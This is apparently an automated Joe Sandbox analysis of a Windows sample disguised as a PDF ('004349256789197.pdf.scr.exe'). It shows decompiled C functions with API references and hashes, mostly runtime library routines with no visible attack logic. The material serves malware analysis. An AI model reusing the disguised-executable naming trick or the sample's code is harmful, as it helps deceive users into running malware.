                C-Code - Quality: 82%
                			E003F9869(void* __ecx, void* __edx) {
                				void* __ebx;
                				void* __edi;
                				intOrPtr _t2;
                				void* _t4;
                				void* _t10;
                				void* _t11;
                				void* _t13;
                				void* _t16;
                				void* _t17;
                				long _t18;
                
                				_t11 = __ecx;
                				_t18 = GetLastError();
                				_t10 = 0;
                				_t2 =  *0x40e7fc; // 0x6
                				_t21 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t17 = E003FB136(_t11, 1, 0x364);
                					_pop(_t13);
                					if(_t17 != 0) {
                						_t4 = E003FAEB1(_t10, _t13, _t17, __eflags,  *0x40e7fc, _t17);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E003F9649(_t13, _t17, 0x432288);
                							E003F8DCC(_t10);
                							__eflags = _t17;
                							if(_t17 != 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t17);
                							goto L4;
                						}
                					} else {
                						_push(_t10);
                						L4:
                						E003F8DCC();
                						L8:
                						SetLastError(_t18);
                					}
                				} else {
                					_t17 = E003FAE5B(0, _t11, _t16, _t21, _t2);
                					if(_t17 != 0) {
                						L9:
                						SetLastError(_t18);
                						_t10 = _t17;
                					} else {
                						goto L2;
                					}
                				}
                				return _t10;
                			}














                APIs
                • GetLastError.KERNEL32(?,?,?,003F91AD,003FB188,?,003F9813,00000001,00000364,?,003F40EF,?,?,00411098), ref: 003F986E
                • _free.LIBCMT ref: 003F98A3
                • _free.LIBCMT ref: 003F98CA
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F98D7
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F98E0
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 894c4e8be4d59ce64509124840ddc5b9dbfb1aa14d6701053dd8215f6304a25a
                • Instruction ID: a24903abfb48ac0629656bbfc4b633773f8c4711c1e64ee147703b3910ac95ac
                • Opcode Fuzzy Hash: 894c4e8be4d59ce64509124840ddc5b9dbfb1aa14d6701053dd8215f6304a25a
                • Instruction Fuzzy Hash: E301F43614560D6BC3132766AE85B3B296DDFD37F5B220137F715A6292EE308C015129
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E003E0EED(void* __ecx) {
                				intOrPtr _v16;
                				void* __ebp;
                				int _t16;
                				long* _t20;
                				void** _t26;
                				void* _t28;
                				void* _t30;
                				intOrPtr _t31;
                
                				_t22 = __ecx;
                				_push(0xffffffff);
                				_push(0x402641);
                				_push( *[fs:0x0]);
                				 *[fs:0x0] = _t31;
                				_t28 = __ecx;
                				E003E11CF(__ecx);
                				_t20 = 0;
                				 *((char*)(__ecx + 0x314)) = 1;
                				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
                				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
                					_t26 = _t28 + 4;
                					do {
                						E003E0FE4(_t22, _t30,  *_t26);
                						CloseHandle( *_t26);
                						_t20 = _t20 + 1;
                						_t26 =  &(_t26[1]);
                					} while (_t20 <  *((intOrPtr*)(_t28 + 0x104)));
                				}
                				DeleteCriticalSection(_t28 + 0x320);
                				CloseHandle( *(_t28 + 0x318));
                				_t16 = CloseHandle( *(_t28 + 0x31c));
                				 *[fs:0x0] = _v16;
                				return _t16;
                			}












                APIs
                  • Part of subcall function 003E11CF: ResetEvent.KERNEL32(?), ref: 003E11E1
                  • Part of subcall function 003E11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003E11F5
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 003E0F21
                • CloseHandle.KERNEL32(?,?), ref: 003E0F3B
                • DeleteCriticalSection.KERNEL32(?), ref: 003E0F54
                • CloseHandle.KERNEL32(?), ref: 003E0F60
                • CloseHandle.KERNEL32(?), ref: 003E0F6C
                  • Part of subcall function 003E0FE4: WaitForSingleObject.KERNEL32(?,000000FF,003E1101,?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FEA
                  • Part of subcall function 003E0FE4: GetLastError.KERNEL32(?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FF6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: 40a766e0cb9190090e47a15a2a7554dfd0593d5f84954d230b3d970905d37669
                • Instruction ID: c7d703ae0067303e2f8145db4ce573538a6cc909600b0b711d1d2dd1ec71601f
                • Opcode Fuzzy Hash: 40a766e0cb9190090e47a15a2a7554dfd0593d5f84954d230b3d970905d37669
                • Instruction Fuzzy Hash: 5A019271000740EFC7229F65DD84BC6BBADFB08711F004929F15A621A0C7B57A55CA54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003FC7FF(intOrPtr* _a4) {
                				intOrPtr _t6;
                				intOrPtr* _t21;
                				void* _t23;
                				void* _t24;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t21 = _a4;
                				if(_t21 != 0) {
                					_t23 =  *_t21 -  *0x40eea0; // 0x40ee94
                					if(_t23 != 0) {
                						E003F8DCC(_t7);
                					}
                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x40eea4; // 0x4326fc
                					if(_t24 != 0) {
                						E003F8DCC(_t8);
                					}
                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x40eea8; // 0x4326fc
                					if(_t25 != 0) {
                						E003F8DCC(_t9);
                					}
                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x40eed0; // 0x40ee98
                					if(_t26 != 0) {
                						E003F8DCC(_t10);
                					}
                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                					_t27 = _t6 -  *0x40eed4; // 0x432700
                					if(_t27 != 0) {
                						return E003F8DCC(_t6);
                					}
                				}
                				return _t6;
                			}











                APIs
                • _free.LIBCMT ref: 003FC817
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003FC829
                • _free.LIBCMT ref: 003FC83B
                • _free.LIBCMT ref: 003FC84D
                • _free.LIBCMT ref: 003FC85F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 810c952dbb74e0fcfe9066969cd29790990fc87def3c71082ab3ef176aa5b31c
                • Instruction ID: ea28f2095b26090a9ac5c8f911663852de441598205b24d5e81cda2419a3f43c
                • Opcode Fuzzy Hash: 810c952dbb74e0fcfe9066969cd29790990fc87def3c71082ab3ef176aa5b31c
                • Instruction Fuzzy Hash: 50F0623255420CABC726DB69E685C2673E9AE007907592C29F308EB592CB74FC80CA94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003E1FDD(void* __eflags, short* _a4, short* _a8, int _a12) {
                				void* _t10;
                				int _t22;
                				int _t23;
                
                				_t10 = E003F3E13(_a4);
                				_t23 = _a12;
                				if(_t10 + 1 >= _t23) {
                					_t22 = _t23;
                				} else {
                					_t4 = E003F3E13(_a4) + 1; // 0x1
                					_t22 = _t4;
                				}
                				if(E003F3E13(_a8) + 1 < _t23) {
                					_t7 = E003F3E13(_a8) + 1; // 0x1
                					_t23 = _t7;
                				}
                				return CompareStringW(0x400, 0x1001, _a4, _t22, _a8, _t23) - 2;
                			}







                APIs
                • _wcslen.LIBCMT ref: 003E1FE5
                • _wcslen.LIBCMT ref: 003E1FF6
                • _wcslen.LIBCMT ref: 003E2006
                • _wcslen.LIBCMT ref: 003E2014
                • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,003DB371,?,?,00000000,?,?,?), ref: 003E202F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$CompareString
                • String ID:
                • API String ID: 3397213944-0
                • Opcode ID: 19027c9b4b4258a5aaf94fd687e2b6aa21911f82b9db5f95cd99bfc9de10693e
                • Instruction ID: d1d59431018dd3e8daab683da3bee09d431521f07104cf1f5ebf78bda12d9aaa
                • Opcode Fuzzy Hash: 19027c9b4b4258a5aaf94fd687e2b6aa21911f82b9db5f95cd99bfc9de10693e
                • Instruction Fuzzy Hash: DDF01D33008068BFDF236F51EC09D9A7F2AEF64760B118415F61A5E0A1CB729A61D690
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E003EA80C(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                				signed int _v0;
                				signed int _v4;
                				void _v68;
                				signed int _v72;
                				signed int _v76;
                				intOrPtr _v84;
                				char _v96;
                				char _v100;
                				char _v104;
                				char _v108;
                				void* _v112;
                				char _v116;
                				char _v120;
                				short _v122;
                				short _v124;
                				signed int _v128;
                				intOrPtr _v132;
                				signed int _v136;
                				char _v140;
                				intOrPtr* _v144;
                				char _v156;
                				intOrPtr* _v164;
                				intOrPtr* _v168;
                				intOrPtr _v176;
                				char _v180;
                				char _v184;
                				intOrPtr* _v196;
                				intOrPtr _v212;
                				signed int _v216;
                				signed int _v220;
                				void* _v224;
                				char _v228;
                				intOrPtr _v232;
                				intOrPtr* _v236;
                				intOrPtr* _v244;
                				void* _v256;
                				void* _v260;
                				intOrPtr* _v268;
                				intOrPtr* _t94;
                				void* _t96;
                				intOrPtr* _t97;
                				signed int _t100;
                				intOrPtr* _t103;
                				intOrPtr* _t106;
                				short _t114;
                				intOrPtr _t117;
                				intOrPtr* _t118;
                				intOrPtr* _t121;
                				intOrPtr* _t124;
                				intOrPtr* _t130;
                				signed int _t133;
                				intOrPtr* _t139;
                				intOrPtr* _t143;
                				void* _t148;
                				signed int _t150;
                				intOrPtr* _t156;
                				intOrPtr* _t166;
                				intOrPtr* _t169;
                				char _t180;
                				void* _t182;
                				intOrPtr* _t186;
                				signed int _t198;
                				long long* _t202;
                				long long _t204;
                
                				_t204 = __fp0;
                				_t202 =  &_v112;
                				if(E003EA699() != 0) {
                					_t148 = _a4;
                					GetObjectW(_t148, 0x18,  &_v68);
                					_t150 = _v4;
                					asm("cdq");
                					_t198 = _v72 * _t150 / _v76;
                					if(_t198 >= _v0) {
                						_t198 = _v0;
                					}
                					if(_t150 != _v76 || _t198 != _v72) {
                						_t180 = 0;
                						_push( &_v124);
                						_push(0x404754);
                						_push(1);
                						_push(0);
                						_push(0x40555c);
                						if( *0x433188() >= 0) {
                							_t94 = _v144;
                							 *0x403278(_t94, _t148, 0, 2,  &_v140, _t182);
                							_t96 =  *((intOrPtr*)( *_t94 + 0x54))();
                							_t97 = _v164;
                							if(_t96 < 0) {
                								L14:
                								 *0x403278(_t97);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
                								L21:
                								_t100 =  *0x4330e4(_t148, _t180, _t180, _t180, _t180);
                								L22:
                								goto L23;
                							}
                							_v156 = 0;
                							_t186 =  *((intOrPtr*)( *_t97 + 0x28));
                							_t156 = _t186;
                							 *0x403278(_t97,  &_v156);
                							if( *_t186() < 0) {
                								L13:
                								_t103 = _v168;
                								 *0x403278(_t103);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
                								_t97 = _v176;
                								goto L14;
                							}
                							_t106 = _v164;
                							asm("fldz");
                							 *_t202 = _t204;
                							 *0x403278(_t106, _v168, 0x40556c, 0, 0, _t156, _t156, 0);
                							if( *((intOrPtr*)( *_t106 + 0x20))() >= 0) {
                								_v132 = _v84;
                								_v116 = 0;
                								_v128 =  ~_t198;
                								_v112 = 0;
                								_v124 = 1;
                								_t114 = 0x20;
                								_v122 = _t114;
                								_v108 = 0;
                								_v104 = 0;
                								_v100 = 0;
                								_v96 = 0;
                								_v136 = 0x28;
                								_v120 = 0;
                								_v184 = 0;
                								_t117 =  *0x433058(0,  &_v136, 0,  &_v180, 0, 0);
                								_v212 = _t117;
                								if(_t117 != 0) {
                									_t166 = _v228;
                									 *0x403278(_t166,  &_v216);
                									 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2c))))();
                									_t130 = _v224;
                									 *0x403278(_t130, _v232, _v116, _t198, 3);
                									 *((intOrPtr*)( *_t130 + 0x20))();
                									_t133 = _v136;
                									_t169 = _v244;
                									_v216 = _t198;
                									_v220 = _t133;
                									_v228 = 0;
                									_v224 = 0;
                									 *0x403278(_t169,  &_v228, _t133 << 2, _t198 * _t133 << 2, _v232);
                									if( *((intOrPtr*)( *_t169 + 0x1c))() < 0) {
                										DeleteObject(_v260);
                									} else {
                										_v256 = _v260;
                									}
                									_t139 = _v268;
                									 *0x403278(_t139);
                									 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))();
                								}
                								_t118 = _v224;
                								 *0x403278(_t118);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
                								_t121 = _v224;
                								 *0x403278(_t121);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
                								_t124 = _v236;
                								 *0x403278(_t124);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))();
                								_t100 = _v220;
                								if(_t100 != 0) {
                									goto L22;
                								} else {
                									goto L21;
                								}
                							}
                							_t143 = _v196;
                							 *0x403278(_t143);
                							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 8))))();
                							goto L13;
                						}
                						goto L8;
                					} else {
                						_t180 = 0;
                						L8:
                						_t100 =  *0x4330e4(_t148, _t180, _t180, _t180, _t180);
                						L23:
                						return _t100;
                					}
                				}
                				_push(_a12);
                				_push(_a8);
                				_push(_a4);
                				return E003EAAC9();
                			}

                APIs
                  • Part of subcall function 003EA699: GetDC.USER32(00000000), ref: 003EA69D
                  • Part of subcall function 003EA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 003EA6A8
                  • Part of subcall function 003EA699: ReleaseDC.USER32(00000000,00000000), ref: 003EA6B3
                • GetObjectW.GDI32(?,00000018,?), ref: 003EA83C
                  • Part of subcall function 003EAAC9: GetDC.USER32(00000000), ref: 003EAAD2
                  • Part of subcall function 003EAAC9: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,003EA829,?,?,?), ref: 003EAB01
                  • Part of subcall function 003EAAC9: ReleaseDC.USER32(00000000,?), ref: 003EAB99
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: ">$(
                • API String ID: 1061551593-3044792024
                • Opcode ID: e27be849a28565314ba86884bead11d9a092e2e1ad23d0f43f8f3314aea95cf2
                • Instruction ID: 9cdb110bb02278f49608eb20700dd51693352134a485cb2fca00c6d2c14ed26d
                • Opcode Fuzzy Hash: e27be849a28565314ba86884bead11d9a092e2e1ad23d0f43f8f3314aea95cf2
                • Instruction Fuzzy Hash: 3891EF71608794AFD611DF25C848E2BBBF8FF89701F00496EF59AD7260DB30A945CB62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 19%
                			E003E15FE(intOrPtr* __ecx) {
                				char _v516;
                				char _v5124;
                				signed int _t33;
                				void* _t45;
                				signed int _t46;
                				signed int _t47;
                				signed int _t48;
                				signed int _t51;
                				void* _t61;
                				void* _t62;
                
                				E003EEC50(0x1400);
                				_t57 = __ecx;
                				_t33 =  *(__ecx + 0x48);
                				_t61 = _t33 - 0x74;
                				if(_t61 > 0) {
                					__eflags = _t33 - 0x83;
                					if(_t33 == 0x83) {
                						E003ED694();
                						__eflags =  *(_t57 + 4);
                						if( *(_t57 + 4) == 0) {
                							E003E0602( &_v5124, E003DE617(0xc9), 0xa00);
                						} else {
                							E003D4092( &_v5124, 0xa00, E003DE617(0xca),  *(_t57 + 4));
                						}
                						return E003EA7E4( *0x418450,  &_v5124, E003DE617(0x96), 0);
                					}
                				} else {
                					if(_t61 == 0) {
                						_push(0x456);
                						L38:
                						_push(E003DE617());
                						_push( *_t57);
                						L19:
                						_t45 = E003EB776();
                						L11:
                						return _t45;
                					}
                					_t62 = _t33 - 0x16;
                					if(_t62 > 0) {
                						__eflags = _t33 - 0x38;
                						if(__eflags > 0) {
                							_t46 = _t33 - 0x39;
                							__eflags = _t46;
                							if(_t46 == 0) {
                								_push(0x8c);
                								goto L38;
                							}
                							_t47 = _t46 - 1;
                							__eflags = _t47;
                							if(_t47 == 0) {
                								_push(0x6f);
                								goto L38;
                							}
                							_t48 = _t47 - 1;
                							__eflags = _t48;
                							if(_t48 == 0) {
                								_push( *((intOrPtr*)(__ecx + 4)));
                								_push(0x406);
                								goto L13;
                							}
                							_t51 = _t48 - 9;
                							__eflags = _t51;
                							if(_t51 == 0) {
                								_push(0x343);
                								goto L38;
                							}
                							_t33 = _t51 - 1;
                							__eflags = _t33;
                							if(_t33 == 0) {
                								_push(0x86);
                								goto L38;
                							}
                						} else {
                							if(__eflags == 0) {
                								_push(0x67);
                								goto L38;
                							}
                							_t33 = _t33 - 0x17;
                							__eflags = _t33 - 0xb;
                							if(_t33 <= 0xb) {
                								switch( *((intOrPtr*)(_t33 * 4 +  &M003E190E))) {
                									case 0:
                										_push(0xde);
                										goto L18;
                									case 1:
                										_push(0xe1);
                										goto L18;
                									case 2:
                										_push(0xb4);
                										goto L38;
                									case 3:
                										_push(0x69);
                										goto L38;
                									case 4:
                										_push(0x6a);
                										goto L38;
                									case 5:
                										_push( *((intOrPtr*)(__esi + 4)));
                										_push(0x68);
                										goto L13;
                									case 6:
                										_push(0x46f);
                										goto L38;
                									case 7:
                										_push(0x470);
                										goto L38;
                									case 8:
                										_push( *((intOrPtr*)(__esi + 4)));
                										_push(0x471);
                										goto L13;
                									case 9:
                										goto L64;
                									case 0xa:
                										_push( *((intOrPtr*)(__esi + 4)));
                										_push(0x71);
                										goto L13;
                									case 0xb:
                										E003DE617(0xc8) =  &_v516;
                										__eax = E003D4092( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
                										_push( *((intOrPtr*)(__esi + 8)));
                										__eax =  &_v516;
                										_push( &_v516);
                										return E003EB776( *__esi, L"%s: %s");
                								}
                							}
                						}
                					} else {
                						if(_t62 == 0) {
                							_push( *__ecx);
                							_push(0xdd);
                							L23:
                							E003DE617();
                							L7:
                							_push(0);
                							L8:
                							return E003EB776();
                						}
                						if(_t33 <= 0x15) {
                							switch( *((intOrPtr*)(_t33 * 4 +  &M003E18B6))) {
                								case 0:
                									_push( *__esi);
                									_push(L"%ls");
                									_push(">");
                									goto L8;
                								case 1:
                									_push( *__ecx);
                									_push(L"%ls");
                									goto L7;
                								case 2:
                									_push(0);
                									__eax = E003EAECD();
                									goto L11;
                								case 3:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x7b);
                									goto L13;
                								case 4:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x7a);
                									goto L13;
                								case 5:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x7c);
                									goto L13;
                								case 6:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0xca);
                									goto L13;
                								case 7:
                									_push(0x70);
                									L18:
                									_push(E003DE617());
                									_push(0);
                									goto L19;
                								case 8:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x72);
                									goto L13;
                								case 9:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x78);
                									goto L13;
                								case 0xa:
                									_push( *__esi);
                									_push(0x85);
                									goto L23;
                								case 0xb:
                									_push( *__esi);
                									_push(0x204);
                									goto L23;
                								case 0xc:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x84);
                									goto L13;
                								case 0xd:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x83);
                									goto L13;
                								case 0xe:
                									goto L64;
                								case 0xf:
                									_push( *((intOrPtr*)(__esi + 8)));
                									_push( *((intOrPtr*)(__esi + 4)));
                									__eax = E003DE617(0xd2);
                									return __eax;
                								case 0x10:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0x79);
                									goto L13;
                								case 0x11:
                									_push( *((intOrPtr*)(__esi + 4)));
                									_push(0xdc);
                									L13:
                									_push(E003DE617());
                									_push( *_t57);
                									goto L8;
                							}
                						}
                					}
                				}
                				L64:
                				return _t33;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: 7a7a14c2b168a892da725854f0e390b0cd1e41bb19d862dc0d6ad7591e328380
                • Instruction ID: bd6264c5817456935555d8218dd2daaf8297c79dbe8bcae8923ec935eb306810
                • Opcode Fuzzy Hash: 7a7a14c2b168a892da725854f0e390b0cd1e41bb19d862dc0d6ad7591e328380
                • Instruction Fuzzy Hash: 5951FB762483F0F7EA2326928D46F36B66DAB15F04F244707F7D66C8D1C5B2A410A71A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003F7F6E(void* __ecx, void* __edx, intOrPtr _a4) {
                				signed int _v8;
                				void* _v12;
                				char _v16;
                				intOrPtr* _t36;
                				struct HINSTANCE__* _t37;
                				struct HINSTANCE__* _t43;
                				intOrPtr* _t44;
                				intOrPtr* _t45;
                				CHAR* _t49;
                				struct HINSTANCE__* _t50;
                				void* _t52;
                				struct HINSTANCE__* _t55;
                				intOrPtr* _t59;
                				struct HINSTANCE__* _t64;
                				intOrPtr _t65;
                
                				_t52 = __ecx;
                				if(_a4 == 2 || _a4 == 1) {
                					E003FBB30(_t52);
                					GetModuleFileNameA(0, 0x432128, 0x104);
                					_t49 =  *0x4326d8; // 0x2b52450
                					 *0x4326e0 = 0x432128;
                					if(_t49 == 0 ||  *_t49 == 0) {
                						_t49 = 0x432128;
                					}
                					_v8 = 0;
                					_v16 = 0;
                					E003F8092(_t52, _t49, 0, 0,  &_v8,  &_v16);
                					_t64 = E003F8207(_v8, _v16, 1);
                					if(_t64 != 0) {
                						E003F8092(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                						if(_a4 != 1) {
                							_v12 = 0;
                							_push( &_v12);
                							_t50 = E003FB643(_t64);
                							if(_t50 == 0) {
                								_t59 = _v12;
                								_t55 = 0;
                								_t36 = _t59;
                								if( *_t59 == 0) {
                									L15:
                									_t37 = 0;
                									 *0x4326cc = _t55;
                									_v12 = 0;
                									_t50 = 0;
                									 *0x4326d0 = _t59;
                									L16:
                									E003F8DCC(_t37);
                									_v12 = 0;
                									goto L17;
                								} else {
                									goto L14;
                								}
                								do {
                									L14:
                									_t36 = _t36 + 4;
                									_t55 =  &(_t55->i);
                								} while ( *_t36 != 0);
                								goto L15;
                							}
                							_t37 = _v12;
                							goto L16;
                						}
                						 *0x4326cc = _v8 - 1;
                						_t43 = _t64;
                						_t64 = 0;
                						 *0x4326d0 = _t43;
                						goto L10;
                					} else {
                						_t44 = E003F91A8();
                						_push(0xc);
                						_pop(0);
                						 *_t44 = 0;
                						L10:
                						_t50 = 0;
                						L17:
                						E003F8DCC(_t64);
                						return _t50;
                					}
                				} else {
                					_t45 = E003F91A8();
                					_t65 = 0x16;
                					 *_t45 = _t65;
                					E003F9087();
                					return _t65;
                				}
                			}


                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\004349256789197.pdf.scr.exe,00000104), ref: 003F7FAE
                • _free.LIBCMT ref: 003F8079
                • _free.LIBCMT ref: 003F8083
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\004349256789197.pdf.scr.exe
                • API String ID: 2506810119-1002901006
                • Opcode ID: badea8623bcf8343d060b2184880eb7fbd967ead6e0794ca3378d7f627ef85a5
                • Instruction ID: bc17597006ac3108a7639436dd8dcc6f3c09fb857a0602272e8c731a963a3f9e
                • Opcode Fuzzy Hash: badea8623bcf8343d060b2184880eb7fbd967ead6e0794ca3378d7f627ef85a5
